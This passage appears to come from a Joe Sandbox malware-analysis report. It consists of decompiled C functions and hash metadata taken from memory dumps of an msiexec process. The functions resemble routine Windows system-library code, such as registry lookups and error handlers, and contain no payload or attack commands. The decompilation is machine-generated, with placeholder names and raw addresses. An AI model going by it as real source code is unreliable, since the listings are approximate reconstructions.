                              						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              					}
                              					if( *_t69 != 0) {
                              						E04DBFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                              					}
                              					if(( *0x4df8724 & 0x00000008) != 0) {
                              						E04DC52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                              					}
                              					_t117 = _v44;
                              					goto L26;
                              				}
                              				while(E04DD15B5(0x4df8ae4, _t83, _t97, _t97) >= 0) {
                              					_t97 = _v28;
                              					_t83 = _t83 + 2;
                              					if(_t83 < _v40) {
                              						continue;
                              					}
                              					goto L10;
                              				}
                              				goto L24;
                              			}

























                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: `
                              • API String ID: 0-2679148245
                              • Opcode ID: 874ab1097e2ada336d63768470d3bf3699aadda3e69a579a0b9fcb2f23cdfcf4
                              • Instruction ID: 037ff111ffc29e90920e2bc510db1181a27a2c5491065c47d1527ac8075c2087
                              • Opcode Fuzzy Hash: 874ab1097e2ada336d63768470d3bf3699aadda3e69a579a0b9fcb2f23cdfcf4
                              • Instruction Fuzzy Hash: 90516A713083429FE325EF28D984B2BB7E5EBC4708F144A2DF99697291D671F805CB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E04D3F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				char* _v20;
                              				intOrPtr _v24;
                              				char _v28;
                              				intOrPtr _v32;
                              				char _v36;
                              				char _v44;
                              				char _v52;
                              				intOrPtr _v56;
                              				char _v60;
                              				intOrPtr _v72;
                              				void* _t51;
                              				void* _t58;
                              				signed short _t82;
                              				short _t84;
                              				signed int _t91;
                              				signed int _t100;
                              				signed short* _t103;
                              				void* _t108;
                              				intOrPtr* _t109;
                              
                              				_t103 = __ecx;
                              				_t82 = __edx;
                              				_t51 = E04D24120(0, __ecx, 0,  &_v52, 0, 0, 0);
                              				if(_t51 >= 0) {
                              					_push(0x21);
                              					_push(3);
                              					_v56 =  *0x7ffe02dc;
                              					_v20 =  &_v52;
                              					_push( &_v44);
                              					_v28 = 0x18;
                              					_push( &_v28);
                              					_push(0x100020);
                              					_v24 = 0;
                              					_push( &_v60);
                              					_v16 = 0x40;
                              					_v12 = 0;
                              					_v8 = 0;
                              					_t58 = E04D49830();
                              					_t87 =  *[fs:0x30];
                              					_t108 = _t58;
                              					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                              					if(_t108 < 0) {
                              						L11:
                              						_t51 = _t108;
                              					} else {
                              						_push(4);
                              						_push(8);
                              						_push( &_v36);
                              						_push( &_v44);
                              						_push(_v60);
                              						_t108 = E04D49990();
                              						if(_t108 < 0) {
                              							L10:
                              							_push(_v60);
                              							E04D495D0();
                              							goto L11;
                              						} else {
                              							_t109 = L04D24620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                              							if(_t109 == 0) {
                              								_t108 = 0xc0000017;
                              								goto L10;
                              							} else {
                              								_t21 = _t109 + 0x18; // 0x18
                              								 *((intOrPtr*)(_t109 + 4)) = _v60;
                              								 *_t109 = 1;
                              								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                              								 *(_t109 + 0xe) = _t82;
                              								 *((intOrPtr*)(_t109 + 8)) = _v56;
                              								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                              								E04D4F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                              								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                              								 *((short*)(_t109 + 0xc)) =  *_t103;
                              								_t91 =  *_t103 & 0x0000ffff;
                              								_t100 = _t91 & 0xfffffffe;
                              								_t84 = 0x5c;
                              								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                              									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                              										_push(_v60);
                              										E04D495D0();
                              										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                              										_t51 = 0xc0000106;
                              									} else {
                              										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                              										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                              										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                              										goto L5;
                              									}
                              								} else {
                              									L5:
                              									 *_a4 = _t109;
                              									_t51 = 0;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _t51;
                              			}


























                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                              • Instruction ID: 95debcb1a89be07c268f00408ccc05179144c5d019bc8a94c8d77a462235d0e9
                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                              • Instruction Fuzzy Hash: 125180716047149FD321DF29C840A67BBF4FF88714F108A2EF99597650E7B4E914CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E04D83540(intOrPtr _a4) {
                              				signed int _v12;
                              				intOrPtr _v88;
                              				intOrPtr _v92;
                              				char _v96;
                              				char _v352;
                              				char _v1072;
                              				intOrPtr _v1140;
                              				intOrPtr _v1148;
                              				char _v1152;
                              				char _v1156;
                              				char _v1160;
                              				char _v1164;
                              				char _v1168;
                              				char* _v1172;
                              				short _v1174;
                              				char _v1176;
                              				char _v1180;
                              				char _v1192;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				short _t41;
                              				short _t42;
                              				intOrPtr _t80;
                              				intOrPtr _t81;
                              				signed int _t82;
                              				void* _t83;
                              
                              				_v12 =  *0x4dfd360 ^ _t82;
                              				_t41 = 0x14;
                              				_v1176 = _t41;
                              				_t42 = 0x16;
                              				_v1174 = _t42;
                              				_v1164 = 0x100;
                              				_v1172 = L"BinaryHash";
                              				_t81 = E04D40BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                              				if(_t81 < 0) {
                              					L11:
                              					_t75 = _t81;
                              					E04D83706(0, _t81, _t79, _t80);
                              					L12:
                              					if(_a4 != 0xc000047f) {
                              						E04D4FA60( &_v1152, 0, 0x50);
                              						_v1152 = 0x60c201e;
                              						_v1148 = 1;
                              						_v1140 = E04D83540;
                              						E04D4FA60( &_v1072, 0, 0x2cc);
                              						_push( &_v1072);
                              						E04D5DDD0( &_v1072, _t75, _t79, _t80, _t81);
                              						E04D90C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                              						_push(_v1152);
                              						_push(0xffffffff);
                              						E04D497C0();
                              					}
                              					return E04D4B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                              				}
                              				_t79 =  &_v352;
                              				_t81 = E04D83971(0, _a4,  &_v352,  &_v1156);
                              				if(_t81 < 0) {
                              					goto L11;
                              				}
                              				_t75 = _v1156;
                              				_t79 =  &_v1160;
                              				_t81 = E04D83884(_v1156,  &_v1160,  &_v1168);
                              				if(_t81 >= 0) {
                              					_t80 = _v1160;
                              					E04D4FA60( &_v96, 0, 0x50);
                              					_t83 = _t83 + 0xc;
                              					_push( &_v1180);
                              					_push(0x50);
                              					_push( &_v96);
                              					_push(2);
                              					_push( &_v1176);
                              					_push(_v1156);
                              					_t81 = E04D49650();
                              					if(_t81 >= 0) {
                              						if(_v92 != 3 || _v88 == 0) {
                              							_t81 = 0xc000090b;
                              						}
                              						if(_t81 >= 0) {
                              							_t75 = _a4;
                              							_t79 =  &_v352;
                              							E04D83787(_a4,  &_v352, _t80);
                              						}
                              					}
                              					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                              				}
                              				_push(_v1156);
                              				E04D495D0();
                              				if(_t81 >= 0) {
                              					goto L12;
                              				} else {
                              					goto L11;
                              				}
                              			}
































                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: BinaryHash
                              • API String ID: 0-2202222882
                              • Opcode ID: dc32268d399693c0d52c645066971c98ea0fc20ee3b9a74cac50f79638e4aae0
                              • Instruction ID: 41027b0c3a9c719af482c3d4f3af32632f47de98ee1428b2dd76cc28fd34c10d
                              • Opcode Fuzzy Hash: dc32268d399693c0d52c645066971c98ea0fc20ee3b9a74cac50f79638e4aae0
                              • Instruction Fuzzy Hash: B3411BF1D0151C9BEB21EB54CC45FAEB77CEB44718F004599EA0967250DB31AE488FA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 71%
                              			E04DD05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                              				signed int _v20;
                              				char _v24;
                              				signed int _v28;
                              				char _v32;
                              				signed int _v36;
                              				intOrPtr _v40;
                              				void* __ebx;
                              				void* _t35;
                              				signed int _t42;
                              				char* _t48;
                              				signed int _t59;
                              				signed char _t61;
                              				signed int* _t79;
                              				void* _t88;
                              
                              				_v28 = __edx;
                              				_t79 = __ecx;
                              				if(E04DD07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                              					L13:
                              					_t35 = 0;
                              					L14:
                              					return _t35;
                              				}
                              				_t61 = __ecx[1];
                              				_t59 = __ecx[0xf];
                              				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                              				_v36 = _a8 << 0xc;
                              				_t42 =  *(_t59 + 0xc) & 0x40000000;
                              				asm("sbb esi, esi");
                              				_t88 = ( ~_t42 & 0x0000003c) + 4;
                              				if(_t42 != 0) {
                              					_push(0);
                              					_push(0x14);
                              					_push( &_v24);
                              					_push(3);
                              					_push(_t59);
                              					_push(0xffffffff);
                              					if(E04D49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                              						_push(_t61);
                              						E04DCA80D(_t59, 1, _v20, 0);
                              						_t88 = 4;
                              					}
                              				}
                              				_t35 = E04DCA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                              				if(_t35 < 0) {
                              					goto L14;
                              				}
                              				E04DD1293(_t79, _v40, E04DD07DF(_t79, _v28,  &_a4,  &_a8, 1));
                              				if(E04D27D50() == 0) {
                              					_t48 = 0x7ffe0380;
                              				} else {
                              					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              				}
                              				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                              					E04DC138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                              				}
                              				goto L13;
                              			}


















                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: `
                              • API String ID: 0-2679148245
                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                              • Instruction ID: 142a66fbf2a584edad4f991c62542b2b6eeafa29e7cf950db3eeb4d0aeb03eca
                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                              • Instruction Fuzzy Hash: 2331B132704355ABE721DE25CD85F9B7BD9FBC4758F044229F958AB280E670F904CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E04D83884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                              				char _v8;
                              				intOrPtr _v12;
                              				intOrPtr* _v16;
                              				char* _v20;
                              				short _v22;
                              				char _v24;
                              				intOrPtr _t38;
                              				short _t40;
                              				short _t41;
                              				void* _t44;
                              				intOrPtr _t47;
                              				void* _t48;
                              
                              				_v16 = __edx;
                              				_t40 = 0x14;
                              				_v24 = _t40;
                              				_t41 = 0x16;
                              				_v22 = _t41;
                              				_t38 = 0;
                              				_v12 = __ecx;
                              				_push( &_v8);
                              				_push(0);
                              				_push(0);
                              				_push(2);
                              				_t43 =  &_v24;
                              				_v20 = L"BinaryName";
                              				_push( &_v24);
                              				_push(__ecx);
                              				_t47 = 0;
                              				_t48 = E04D49650();
                              				if(_t48 >= 0) {
                              					_t48 = 0xc000090b;
                              				}
                              				if(_t48 != 0xc0000023) {
                              					_t44 = 0;
                              					L13:
                              					if(_t48 < 0) {
                              						L16:
                              						if(_t47 != 0) {
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                              						}
                              						L18:
                              						return _t48;
                              					}
                              					 *_v16 = _t38;
                              					 *_a4 = _t47;
                              					goto L18;
                              				}
                              				_t47 = L04D24620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                              				if(_t47 != 0) {
                              					_push( &_v8);
                              					_push(_v8);
                              					_push(_t47);
                              					_push(2);
                              					_push( &_v24);
                              					_push(_v12);
                              					_t48 = E04D49650();
                              					if(_t48 < 0) {
                              						_t44 = 0;
                              						goto L16;
                              					}
                              					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                              						_t48 = 0xc000090b;
                              					}
                              					_t44 = 0;
                              					if(_t48 < 0) {
                              						goto L16;
                              					} else {
                              						_t17 = _t47 + 0xc; // 0xc
                              						_t38 = _t17;
                              						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                              							_t48 = 0xc000090b;
                              						}
                              						goto L13;
                              					}
                              				}
                              				_t48 = _t48 + 0xfffffff4;
                              				goto L18;
                              			}
















                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: BinaryName
                              • API String ID: 0-215506332
                              • Opcode ID: 56f6195389173dcc1624995596d39517b95c93f8d6527aeca20492d755f5fcde
                              • Instruction ID: cd133bc96fb0179d20f68ebcf49a888683c83971c1cdaa94528dab3de76dbd9d
                              • Opcode Fuzzy Hash: 56f6195389173dcc1624995596d39517b95c93f8d6527aeca20492d755f5fcde
                              • Instruction Fuzzy Hash: CA31E272A00619AFEB25FA59C945D7FB774FB81B20F01416DEC19A7640E632AE00CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 33%
                              			E04D3D294(void* __ecx, char __edx, void* __eflags) {
                              				signed int _v8;
                              				char _v52;
                              				signed int _v56;
                              				signed int _v60;
                              				intOrPtr _v64;
                              				char* _v68;
                              				intOrPtr _v72;
                              				char _v76;
                              				signed int _v84;
                              				intOrPtr _v88;
                              				char _v92;
                              				intOrPtr _v96;
                              				intOrPtr _v100;
                              				char _v104;
                              				char _v105;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t35;
                              				char _t38;
                              				signed int _t40;
                              				signed int _t44;
                              				signed int _t52;
                              				void* _t53;
                              				void* _t55;
                              				void* _t61;
                              				intOrPtr _t62;
                              				void* _t64;
                              				signed int _t65;
                              				signed int _t66;
                              
                              				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                              				_v8 =  *0x4dfd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                              				_v105 = __edx;
                              				_push( &_v92);
                              				_t52 = 0;
                              				_push(0);
                              				_push(0);
                              				_push( &_v104);
                              				_push(0);
                              				_t59 = __ecx;
                              				_t55 = 2;
                              				if(E04D24120(_t55, __ecx) < 0) {
                              					_t35 = 0;
                              					L8:
                              					_pop(_t61);
                              					_pop(_t64);
                              					_pop(_t53);
                              					return E04D4B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                              				}
                              				_v96 = _v100;
                              				_t38 = _v92;
                              				if(_t38 != 0) {
                              					_v104 = _t38;
                              					_v100 = _v88;
                              					_t40 = _v84;
                              				} else {
                              					_t40 = 0;
                              				}
                              				_v72 = _t40;
                              				_v68 =  &_v104;
                              				_push( &_v52);
                              				_v76 = 0x18;
                              				_push( &_v76);
                              				_v64 = 0x40;
                              				_v60 = _t52;
                              				_v56 = _t52;
                              				_t44 = E04D498D0();
                              				_t62 = _v88;
                              				_t65 = _t44;
                              				if(_t62 != 0) {
                              					asm("lock xadd [edi], eax");
                              					if((_t44 | 0xffffffff) != 0) {
                              						goto L4;
                              					}
                              					_push( *((intOrPtr*)(_t62 + 4)));
                              					E04D495D0();
                              					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                              					goto L4;
                              				} else {
                              					L4:
                              					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                              					if(_t65 >= 0) {
                              						_t52 = 1;
                              					} else {
                              						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                              							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                              						}
                              					}
                              					_t35 = _t52;
                              					goto L8;
                              				}
                              			}


































                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: bd591c1e66784f261c5e243bc6acf8bca6aa59e946b56bdb84ce299e9471414f
                              • Instruction ID: a06febc7f5a2d77fa573c99c4ee8799457bf627c5ee00c681de838cf9aa88661
                              • Opcode Fuzzy Hash: bd591c1e66784f261c5e243bc6acf8bca6aa59e946b56bdb84ce299e9471414f
                              • Instruction Fuzzy Hash: 7231A4B16083459FD721DF28C98096BBBE9FBD5754F00092EF99593210E638ED08DFA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E04D11B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                              				intOrPtr _v8;
                              				char _v16;
                              				intOrPtr* _t26;
                              				intOrPtr _t29;
                              				void* _t30;
                              				signed int _t31;
                              
                              				_t27 = __ecx;
                              				_t29 = __edx;
                              				_t31 = 0;
                              				_v8 = __edx;
                              				if(__edx == 0) {
                              					L18:
                              					_t30 = 0xc000000d;
                              					goto L12;
                              				} else {
                              					_t26 = _a4;
                              					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                              						goto L18;
                              					} else {
                              						E04D4BB40(__ecx,  &_v16, __ecx);
                              						_push(_t26);
                              						_push(0);
                              						_push(0);
                              						_push(_t29);
                              						_push( &_v16);
                              						_t30 = E04D4A9B0();
                              						if(_t30 >= 0) {
                              							_t19 =  *_t26;
                              							if( *_t26 != 0) {
                              								goto L7;
                              							} else {
                              								 *_a8 =  *_a8 & 0;
                              							}
                              						} else {
                              							if(_t30 != 0xc0000023) {
                              								L9:
                              								_push(_t26);
                              								_push( *_t26);
                              								_push(_t31);
                              								_push(_v8);
                              								_push( &_v16);
                              								_t30 = E04D4A9B0();
                              								if(_t30 < 0) {
                              									L12:
                              									if(_t31 != 0) {
                              										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                              									}
                              								} else {
                              									 *_a8 = _t31;
                              								}
                              							} else {
                              								_t19 =  *_t26;
                              								if( *_t26 == 0) {
                              									_t31 = 0;
                              								} else {
                              									L7:
                              									_t31 = L04D24620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                              								}
                              								if(_t31 == 0) {
                              									_t30 = 0xc0000017;
                              								} else {
                              									goto L9;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _t30;
                              			}










                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: WindowsExcludedProcs
                              • API String ID: 0-3583428290
                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                              • Instruction ID: 65c852dd43024bdaec5bdf675a2f296e66a08cfa59c347fe2e5e34d869dd1ce0
                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                              • Instruction Fuzzy Hash: C421D336700268BBDB229ED59940F5FB7BAFB89754F094426EE059B214E630F90097B0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D2F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                              				intOrPtr _t13;
                              				intOrPtr _t14;
                              				signed int _t16;
                              				signed char _t17;
                              				intOrPtr _t19;
                              				intOrPtr _t21;
                              				intOrPtr _t23;
                              				intOrPtr* _t25;
                              
                              				_t25 = _a8;
                              				_t17 = __ecx;
                              				if(_t25 == 0) {
                              					_t19 = 0xc00000f2;
                              					L8:
                              					return _t19;
                              				}
                              				if((__ecx & 0xfffffffe) != 0) {
                              					_t19 = 0xc00000ef;
                              					goto L8;
                              				}
                              				_t19 = 0;
                              				 *_t25 = 0;
                              				_t21 = 0;
                              				_t23 = "Actx ";
                              				if(__edx != 0) {
                              					if(__edx == 0xfffffffc) {
                              						L21:
                              						_t21 = 0x200;
                              						L5:
                              						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                              						 *_t25 = _t13;
                              						L6:
                              						if(_t13 == 0) {
                              							if((_t17 & 0x00000001) != 0) {
                              								 *_t25 = _t23;
                              							}
                              						}
                              						L7:
                              						goto L8;
                              					}
                              					if(__edx == 0xfffffffd) {
                              						 *_t25 = _t23;
                              						_t13 = _t23;
                              						goto L6;
                              					}
                              					_t13 =  *((intOrPtr*)(__edx + 0x10));
                              					 *_t25 = _t13;
                              					L14:
                              					if(_t21 == 0) {
                              						goto L6;
                              					}
                              					goto L5;
                              				}
                              				_t14 = _a4;
                              				if(_t14 != 0) {
                              					_t16 =  *(_t14 + 0x14) & 0x00000007;
                              					if(_t16 <= 1) {
                              						_t21 = 0x1f8;
                              						_t13 = 0;
                              						goto L14;
                              					}
                              					if(_t16 == 2) {
                              						goto L21;
                              					}
                              					if(_t16 != 4) {
                              						_t19 = 0xc00000f0;
                              						goto L7;
                              					}
                              					_t13 = 0;
                              					goto L6;
                              				} else {
                              					_t21 = 0x1f8;
                              					goto L5;
                              				}
                              			}












                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: Actx
                              • API String ID: 0-89312691
                              • Opcode ID: b6866f1667432ebb65c85b121cafd2247d02762022c1bdd6d79b26bfa9b8c9c0
                              • Instruction ID: 36ea32cb8681930560952069e0c734c40edffa0f63e6cea70a16fb4465db64bc
                              • Opcode Fuzzy Hash: b6866f1667432ebb65c85b121cafd2247d02762022c1bdd6d79b26bfa9b8c9c0
                              • Instruction Fuzzy Hash: F11181353046228BE7254F1D879063672B5FBA572CF244D3EE8A1CB391E670F841B340
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 71%
                              			E04DB8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                              				intOrPtr _t35;
                              				void* _t41;
                              
                              				_t40 = __esi;
                              				_t39 = __edi;
                              				_t38 = __edx;
                              				_t35 = __ecx;
                              				_t34 = __ebx;
                              				_push(0x74);
                              				_push(0x4de0d50);
                              				E04D5D0E8(__ebx, __edi, __esi);
                              				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                              				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                              				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                              					E04D95720(0x65, 0, "Critical error detected %lx\n", _t35);
                              					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                              						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                              						asm("int3");
                              						 *(_t41 - 4) = 0xfffffffe;
                              					}
                              				}
                              				 *(_t41 - 4) = 1;
                              				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                              				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                              				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                              				 *((intOrPtr*)(_t41 - 0x64)) = L04D5DEF0;
                              				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                              				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                              				_push(_t41 - 0x70);
                              				L04D5DEF0(1, _t38);
                              				 *(_t41 - 4) = 0xfffffffe;
                              				return E04D5D130(_t34, _t39, _t40);
                              			}






                              Strings
                              • Critical error detected %lx, xrefs: 04DB8E21
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: Critical error detected %lx
                              • API String ID: 0-802127002
                              • Opcode ID: 48ccdcd5eeeb1f9a62f8f38befb6bfe4e783f6b6532e702fa9917402b67a9372
                              • Instruction ID: c42cf670e8a51704f40a0887259b140085b359756116d76877e18aa5addf7d47
                              • Opcode Fuzzy Hash: 48ccdcd5eeeb1f9a62f8f38befb6bfe4e783f6b6532e702fa9917402b67a9372
                              • Instruction Fuzzy Hash: 4411CB71E00308DBEF25EFA888057DCBBB5FB04704F24822DE4AAAB291C7316601DF24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04D9FF60
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
